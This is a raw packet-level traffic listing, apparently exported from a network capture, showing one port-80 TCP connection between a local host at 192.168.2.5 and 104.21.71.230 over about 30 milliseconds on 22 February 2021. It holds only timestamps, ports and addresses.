                                                                                                                                                                Feb 22, 2021 07:45:59.857203960 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.857229948 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.857259989 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.857990026 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858022928 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858047962 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858072042 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858098984 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858127117 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.858165026 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.858195066 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.858997107 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859028101 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859050989 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859075069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859102011 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859124899 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.859149933 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.859178066 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.859185934 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.859945059 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860002041 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860027075 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860049963 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860073090 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860083103 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.860096931 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.860100985 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860156059 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.860852003 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860881090 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860903025 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860927105 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860950947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860977888 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.860986948 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.861006021 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.861862898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.861891985 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.861916065 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.861941099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.861953974 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.861964941 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.861974001 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.861989975 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862056017 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.862070084 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.862807989 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862838030 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862862110 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862889051 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862912893 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862911940 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.862937927 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.862945080 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.863786936 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863815069 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863840103 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863863945 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863878965 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.863888025 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863899946 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.863913059 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.863986015 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.864001989 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.864686966 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864717960 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864742994 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864767075 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864790916 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864814997 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.864839077 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.864869118 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.864877939 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.865638018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865669966 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865693092 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865717888 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865741014 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865746975 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.865767002 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.865823030 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.865839005 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.866607904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866640091 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866663933 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866688967 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866713047 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866739988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.866741896 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.866770029 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.867561102 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867593050 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867616892 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867641926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867665052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867679119 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.867688894 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.867691040 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.867729902 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.867779016 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.868544102 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868573904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868655920 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868664026 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.868695021 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868743896 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868771076 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.868778944 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.868954897 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.869469881 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869499922 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869524002 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869550943 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869570017 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869595051 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.869690895 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.869709969 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.869863987 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.870404959 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870438099 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870465040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870488882 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870497942 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.870512009 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870538950 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.870546103 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.870641947 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.871376991 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871417046 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871442080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871464014 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871489048 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871512890 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.871543884 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.871562004 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.871716022 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.872328043 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872358084 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872381926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872405052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872415066 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.872428894 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872456074 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.872463942 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.872833967 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.873270988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873308897 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873334885 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873358965 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873399019 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873424053 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.873428106 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.873437881 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.873599052 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.874229908 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874258995 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874284029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874306917 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874341965 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874366045 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.874383926 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.874409914 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.874470949 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.875205040 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875235081 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875260115 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875283003 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875305891 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875329971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.875371933 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.875400066 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.875405073 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.876137018 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876163960 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876189947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876214027 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876231909 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.876239061 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876264095 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.876332998 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.876348019 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.877187967 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877248049 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877274036 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877296925 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877321005 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877345085 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.877413988 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.877444029 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.877449989 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.878058910 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878084898 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878117085 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878143072 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878170013 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878187895 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.878232956 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.878264904 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.878298044 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.879024982 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879051924 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879076958 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879101992 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879123926 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879141092 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.879169941 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.879198074 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.879988909 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880017042 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880039930 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880064011 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880064964 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.880074978 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.880086899 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880110979 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.880114079 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880784988 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.880918980 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880944967 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880969048 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.880992889 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881016016 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881038904 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881040096 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.881056070 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.881911039 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881941080 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881964922 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.881989002 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882013083 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882036924 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882038116 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.882055998 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.882091045 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.882096052 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.882867098 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882895947 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882920027 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882944107 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882966042 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.882966042 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.882989883 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883032084 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.883043051 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.883816957 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883846998 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883869886 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883897066 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883922100 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883944988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.883972883 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.883990049 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.884021044 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.884782076 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.884809971 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.884829044 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.884849072 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.884874105 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.884892941 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885003090 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.885811090 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885860920 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885898113 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885921955 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885938883 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.885941029 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.885962009 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886068106 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886081934 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886105061 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886698961 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886725903 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886750937 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886775970 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886797905 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886801958 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886812925 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886821032 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.886867046 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886881113 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.886965990 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.887631893 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887655973 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887679100 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887701988 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887726068 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887748957 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.887768030 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.887784958 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.888335943 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.888627052 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888653994 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888678074 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888701916 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888725042 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888745070 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.888750076 CET8049723104.21.71.230192.168.2.5
                                                                                                                                                                Feb 22, 2021 07:45:59.888750076 CET4972380192.168.2.5104.21.71.230
                                                                                                                                                                Feb 22, 2021 07:45:59.889094114 CET4972380192.168.2.5104.21.71.230
